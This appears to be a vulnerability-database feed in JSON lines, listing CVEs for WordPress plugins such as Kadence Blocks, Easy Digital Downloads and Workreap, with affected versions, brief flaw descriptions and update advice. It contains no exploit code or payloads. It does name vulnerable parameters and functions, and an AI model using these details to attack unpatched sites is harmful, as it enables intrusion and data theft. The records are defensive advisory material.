{"CVE_ID":"CVE-2024-10785","slug":"kadence-blocks","versionImpact":"3.3.3","versionEndExcluding":"3.3.4","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Countdown' widget in all versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186749%40kadence-blocks&new=3186749%40kadence-blocks&sfp_email=&sfph_mail=#file11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186749%40kadence-blocks&new=3186749%40kadence-blocks&sfp_email=&sfph_mail=#file11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40acd95e-9afd-4c84-b19a-a45117c0fcde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40acd95e-9afd-4c84-b19a-a45117c0fcde?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4971","slug":"sassy-social-share","versionImpact":"3.3.3","versionEndExcluding":"3.3.4","description":"The Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'urls' parameter called via the 'heateor_sss_sharing_count' AJAX action in versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85277960-2bba-4cd7-9f4c-e04f6743b96c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85277960-2bba-4cd7-9f4c-e04f6743b96c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4631519b-2060-43a0-b69b-b3d7ed94c705\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4631519b-2060-43a0-b69b-b3d7ed94c705\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13613","slug":"wise-chat","versionImpact":"3.3.2","versionEndExcluding":"3.3.4","description":"The Wise Chat plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.3 via the 'uploads' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads directory which can contain file attachments included in chat messages. The vulnerability was partially patched in version 3.3.3.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wise-chat\\\/trunk\\\/src\\\/services\\\/WiseChatAttachmentsService.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wise-chat\\\/trunk\\\/src\\\/services\\\/WiseChatAttachmentsService.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268074\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268074\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288680\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288680\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f70dabb4-3ae6-43cf-86e2-62ac1454b697?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f70dabb4-3ae6-43cf-86e2-62ac1454b697?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11429","slug":"stars-testimonials-with-slider-and-masonry-grid","versionImpact":"3.3.3","versionEndExcluding":"3.3.4","description":"The Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews \u2013 Stars Testimonials plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'stars-testimonials-with-slider-and-masonry-grid' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/tags\\\/3.3.2\\\/plugin.class.php#L1368\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/tags\\\/3.3.2\\\/plugin.class.php#L1368\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/trunk\\\/plugin.class.php#L1368\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/trunk\\\/plugin.class.php#L1368\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68250b6c-22c8-494f-b0b0-62b80cc4de0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68250b6c-22c8-494f-b0b0-62b80cc4de0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2918","slug":"ultimate-blocks","versionImpact":"3.3.3","versionEndExcluding":"3.3.4","description":"The Ultimate Blocks \u2013 WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/content-filter\\\/block.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/content-filter\\\/block.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/content-toggle\\\/block.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/content-toggle\\\/block.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/how-to\\\/block.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/how-to\\\/block.php#L335\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/tabbed-content\\\/block.php#L136\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/tabbed-content\\\/block.php#L136\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41b2a4cc-fb23-41eb-b1a4-d793ae924d9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41b2a4cc-fb23-41eb-b1a4-d793ae924d9a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5012","slug":"workreap","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The Workreap plugin for WordPress, used by the Workreap - Freelance Marketplace WordPress Theme, is vulnerable to arbitrary file uploads due to missing file type validation in the 'workreap_temp_upload_to_media' function in all versions up to, and including, 3.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454#item-description__release-3-3-3-06-june-2025\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454#item-description__release-3-3-3-06-june-2025\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/185371b1-5c72-424d-a5b8-42c67aa9380c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/185371b1-5c72-424d-a5b8-42c67aa9380c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12875","slug":"easy-digital-downloads","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The Easy Digital Downloads \u2013 eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.2 via the file download functionality. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/includes\\\/process-download.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/includes\\\/process-download.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec065da7-b8aa-414d-9673-5caf87ad45b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec065da7-b8aa-414d-9673-5caf87ad45b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6692","slug":"easy-digital-downloads","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The Easy Digital Downloads \u2013 Sell Digital Files & Subscriptions (eCommerce Store + Payments Made Easy) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Agreement Text value in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54d5ab2-40ba-4ad8-9a77-44aba37f0283?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54d5ab2-40ba-4ad8-9a77-44aba37f0283?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/includes\\\/checkout\\\/template.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/includes\\\/checkout\\\/template.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6691","slug":"easy-digital-downloads","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The Easy Digital Downloads \u2013 Sell Digital Files & Subscriptions (eCommerce Store + Payments Made Easy) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the currency value in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0459a6bd-334d-43b7-b289-271108564a53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0459a6bd-334d-43b7-b289-271108564a53?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/src\\\/Admin\\\/Settings\\\/Sanitize.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/src\\\/Admin\\\/Settings\\\/Sanitize.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47238","slug":"top-10","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in WebberZone Top 10 \u2013 WordPress Popular posts by WebberZone plugin <=\u00a03.3.2 versions.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/top-10\\\/wordpress-top-10-plugin-3-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/top-10\\\/wordpress-top-10-plugin-3-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13517","slug":"easy-digital-downloads","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The Easy Digital Downloads \u2013 eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title value in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3131805%40easy-digital-downloads&new=3131805%40easy-digital-downloads&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3131805%40easy-digital-downloads&new=3131805%40easy-digital-downloads&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d745937-4b0a-480a-9771-8af3288ee98f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d745937-4b0a-480a-9771-8af3288ee98f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13792","slug":"woo-exfood","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The WooCommerce Food - Restaurant Menu & Food ordering plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-food-restaurant-menu-food-ordering\\\/25457330\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-food-restaurant-menu-food-ordering\\\/25457330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec425326-2729-4142-b5f4-460dfd3ed773?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec425326-2729-4142-b5f4-460dfd3ed773?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4252","slug":"eventprime-event-calendar-management","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The EventPrime WordPress plugin through 3.2.9 specifies the price of a booking in the client request, allowing an attacker to purchase bookings without payment.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2019e59-db6c-4014-8057-0644c9a00665\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2019e59-db6c-4014-8057-0644c9a00665\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51688","slug":"ecommerce-product-catalog","versionEndExcluding":"3.3.27","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in impleCode eCommerce Product Catalog Plugin for WordPress.This issue affects eCommerce Product Catalog Plugin for WordPress: from n\/a through 3.3.26.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-26-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-26-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47839","slug":"ecommerce-product-catalog","versionImpact":"3.3.26","versionEndExcluding":"3.3.27","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in impleCode eCommerce Product Catalog Plugin for WordPress plugin <=\u00a03.3.26 versions.","recommendation":"Update to version 3.3.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-26-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-26-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5979","slug":"ecommerce-product-catalog","versionEndExcluding":"3.3.26","description":"The eCommerce Product Catalog Plugin for WordPress plugin before 3.3.26 does not have CSRF checks in some of its admin pages, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks, such as delete all products","recommendation":"Update to version 3.3.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/936934c3-5bfe-416e-b6aa-47bed4db05c4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/936934c3-5bfe-416e-b6aa-47bed4db05c4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5973","slug":"masterstudy-lms-learning-management-system","versionImpact":"3.3.23","versionEndExcluding":"3.3.24","description":"The MasterStudy LMS WordPress Plugin WordPress plugin before 3.3.24 does not prevent students from creating instructor accounts, which could be used to get access to functionalities they shouldn't have.","recommendation":"Update to version 3.3.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59abfb7c-d5ea-45f2-ab9a-4391978e3805\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59abfb7c-d5ea-45f2-ab9a-4391978e3805\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4973","slug":"workreap","versionImpact":"3.3.1","versionEndExcluding":"3.3.2","description":"The Workreap plugin for WordPress, used by the Workreap - Freelance Marketplace WordPress Theme, is vulnerable to authentication bypass in all versions up to, and including, 3.3.1. This is due to the plugin not properly verifying a user's identity prior to logging them in when verifying an account with an email address. This makes it possible for unauthenticated attackers to log in as registered users, including administrators, if they know the user's email address. This is only exploitable if the user's confirmation_key has not already been set by the plugin.","recommendation":"Update to version 3.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454#item-description__release-3-3-2-23-may-2025\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454#item-description__release-3-3-2-23-may-2025\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e7693a3-642a-4eff-902c-d29a3c12deb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e7693a3-642a-4eff-902c-d29a3c12deb0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0688","slug":"metform","versionEndExcluding":"3.3.2","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf_thankyou' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about form submissions, including payment status, and transaction ID.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81fc41a4-9206-404c-bd5b-821c77ff3593?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81fc41a4-9206-404c-bd5b-821c77ff3593?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9685","slug":"notification-for-telegram","versionImpact":"3.3.1","versionEndExcluding":"3.3.2","description":"The Notification for Telegram plugin for WordPress is vulnerable to unauthorized test message sending due to a missing capability check on the 'nftb_test_action' function in versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to send a test message via the Telegram Bot API to all users configured in the settings.","recommendation":"Update to version 3.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abaebd3b-69ab-4e9b-a528-c9d846e62238?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abaebd3b-69ab-4e9b-a528-c9d846e62238?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notification-for-telegram\\\/tags\\\/3.3\\\/index.php#L202\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notification-for-telegram\\\/tags\\\/3.3\\\/index.php#L202\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165615\\\/notification-for-telegram\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165615\\\/notification-for-telegram\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7050","slug":"use-your-drive","versionImpact":"3.3.1","versionEndExcluding":"3.3.2","description":"The Use-your-Drive | Google Drive plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' parameter in file metadata in all versions up to, and including, 3.3.1 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability can be exploited by the lowest authentication level permitted to upload files, including unauthenticated users, once a file upload shortcode is published on a publicly accessible post.","recommendation":"Update to version 3.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpcloudplugins.gitbook.io\\\/docs\\\/other\\\/changelog\",\"name\":\"https:\\\/\\\/wpcloudplugins.gitbook.io\\\/docs\\\/other\\\/changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de0c8922-b290-4582-9079-e79da684bcff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de0c8922-b290-4582-9079-e79da684bcff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13658","slug":"ngg-smart-image-search","versionImpact":"3.2.1","versionEndExcluding":"3.3.2","description":"The NGG Smart Image Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hr_SIS_nextgen_searchbox' shortcode in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233519%40ngg-smart-image-search&new=3233519%40ngg-smart-image-search&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233519%40ngg-smart-image-search&new=3233519%40ngg-smart-image-search&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d916e320-e78b-4305-a4da-10c6fb8db41a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d916e320-e78b-4305-a4da-10c6fb8db41a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4367","slug":"download-manager","versionImpact":"3.3.18","versionEndExcluding":"3.3.19","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpdm_user_dashboard shortcode in all versions up to, and including, 3.3.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/profile.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/profile.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php#L200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3313608%40download-manager&old=3308801%40download-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3313608%40download-manager&old=3308801%40download-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/029956d7-6e3f-4159-9f53-05691e0262fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/029956d7-6e3f-4159-9f53-05691e0262fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
